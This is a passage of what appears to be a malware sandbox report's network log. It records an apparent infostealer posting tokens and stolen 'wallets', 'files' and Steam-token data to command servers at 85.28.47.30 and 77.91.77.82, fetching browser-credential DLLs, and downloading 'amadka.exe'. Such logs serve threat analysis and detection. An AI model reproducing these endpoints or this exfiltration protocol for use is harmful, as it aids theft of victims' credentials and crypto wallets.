6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 48 43 47 44 42 46 43 42 41 4b 45 43 42 4b 4b 45 42 2d 2d 0d 0a Data Ascii: ------KJEHCGDBFCBAKECBKKEBContent-Disposition: form-data; name="token"c09af433f0c64d5bf0ec231b5cb75319613428c24c5147b2cb9e25d5ea702031ec2bafb6------KJEHCGDBFCBAKECBKKEBContent-Disposition: form-data; name="message"plugins------KJEHCGDBFCBAKECBKKEB--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAAAFBGDBKKEBGCFCBFHost: 85.28.47.30Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 30 39 61 66 34 33 33 66 30 63 36 34 64 35 62 66 30 65 63 32 33 31 62 35 63 62 37 35 33 31 39 36 31 33 34 32 38 63 32 34 63 35 31 34 37 62 32 63 62 39 65 32 35 64 35 65 61 37 30 32 30 33 31 65 63 32 62 61 66 62 36 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 2d 2d 0d 0a Data Ascii: ------EBAAAFBGDBKKEBGCFCBFContent-Disposition: form-data; name="token"c09af433f0c64d5bf0ec231b5cb75319613428c24c5147b2cb9e25d5ea702031ec2bafb6------EBAAAFBGDBKKEBGCFCBFContent-Disposition: form-data; name="message"fplugins------EBAAAFBGDBKKEBGCFCBF--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJKFBAAAFHJEBFIEGIDHost: 85.28.47.30Content-Length: 6407Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIIECAAKECFHIECBKJDHHost: 85.28.47.30Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKEHDGDGHCBGCAKFIIIEHost: 85.28.47.30Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAEBFIJKEBGHIDHIEGIHost: 85.28.47.30Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 30 39 61 66 34 33 33 66 30 63 36 34 64 35 62 66 30 65 63 32 33 31 62 35 63 62 37 35 33 31 39 36 31 33 34 32 38 63 32 34 63 35 31 34 37 62 32 63 62 39 65 32 35 64 35 65 61 37 30 32 30 33 31 65 63 32 62 61 66 62 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 2d 2d 0d 0a Data Ascii: ------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="token"c09af433f0c64d5bf0ec231b5cb75319613428c24c5147b2cb9e25d5ea702031ec2bafb6------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="file"------FCAEBFIJKEBGHIDHIEGI--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCFIDAFBFBAKFHJEGIJHost: 85.28.47.30Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 30 39 61 66 34 33 33 66 30 63 36 34 64 35 62 66 30 65 63 32 33 31 62 35 63 62 37 35 33 31 39 36 31 33 34 32 38 63 32 34 63 35 31 34 37 62 32 63 62 39 65 32 35 64 35 65 61 37 30 32 30 33 31 65 63 32 62 61 66 62 36 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 2d 2d 0d 0a Data Ascii: ------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="token"c09af433f0c64d5bf0ec231b5cb75319613428c24c5147b2cb9e25d5ea702031ec2bafb6------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="file"------EGCFIDAFBFBAKFHJEGIJ--
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEGCAAKFBAEGDGCBGCGHHost: 85.28.47.30Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAAEHJDBKJJKFHJEBKFHost: 85.28.47.30Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 30 39 61 66 34 33 33 66 30 63 36 34 64 35 62 66 30 65 63 32 33 31 62 35 63 62 37 35 33 31 39 36 31 33 34 32 38 63 32 34 63 35 31 34 37 62 32 63 62 39 65 32 35 64 35 65 61 37 30 32 30 33 31 65 63 32 62 61 66 62 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 2d 2d 0d 0a Data Ascii: ------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="token"c09af433f0c64d5bf0ec231b5cb75319613428c24c5147b2cb9e25d5ea702031ec2bafb6------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="message"wallets------FCAAEHJDBKJJKFHJEBKF--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBKFBFCGIEHIDGCFBFBHost: 85.28.47.30Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 42 46 43 47 49 45 48 49 44 47 43 46 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 30 39 61 66 34 33 33 66 30 63 36 34 64 35 62 66 30 65 63 32 33 31 62 35 63 62 37 35 33 31 39 36 31 33 34 32 38 63 32 34 63 35 31 34 37 62 32 63 62 39 65 32 35 64 35 65 61 37 30 32 30 33 31 65 63 32 62 61 66 62 36 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 42 46 43 47 49 45 48 49 44 47 43 46 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 42 46 43 47 49 45 48 49 44 47 43 46 42 46 42 2d 2d 0d 0a Data Ascii: ------GCBKFBFCGIEHIDGCFBFBContent-Disposition: form-data; name="token"c09af433f0c64d5bf0ec231b5cb75319613428c24c5147b2cb9e25d5ea702031ec2bafb6------GCBKFBFCGIEHIDGCFBFBContent-Disposition: form-data; name="message"files------GCBKFBFCGIEHIDGCFBFB--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECBGIDAEHCGDGCBKEBGHost: 85.28.47.30Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 30 39 61 66 34 33 33 66 30 63 36 34 64 35 62 66 30 65 63 32 33 31 62 35 63 62 37 35 33 31 39 36 31 33 34 32 38 63 32 34 63 35 31 34 37 62 32 63 62 39 65 32 35 64 35 65 61 37 30 32 30 33 31 65 63 32 62 61 66 62 36 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 2d 2d 0d 0a Data Ascii: ------IECBGIDAEHCGDGCBKEBGContent-Disposition: form-data; name="token"c09af433f0c64d5bf0ec231b5cb75319613428c24c5147b2cb9e25d5ea702031ec2bafb6------IECBGIDAEHCGDGCBKEBGContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IECBGIDAEHCGDGCBKEBGContent-Disposition: form-data; name="file"------IECBGIDAEHCGDGCBKEBG--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAAEHJDBKJJKFHJEBKFHost: 85.28.47.30Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 30 39 61 66 34 33 33 66 30 63 36 34 64 35 62 66 30 65 63 32 33 31 62 35 63 62 37 35 33 31 39 36 31 33 34 32 38 63 32 34 63 35 31 34 37 62 32 63 62 39 65 32 35 64 35 65 61 37 30 32 30 33 31 65 63 32 62 61 66 62 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 2d 2d 0d 0a Data Ascii: ------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="token"c09af433f0c64d5bf0ec231b5cb75319613428c24c5147b2cb9e25d5ea702031ec2bafb6------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="message"jbdtaijovg------FCAAEHJDBKJJKFHJEBKF--
Source: global traffic HTTP traffic detected: GET /mine/amadka.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
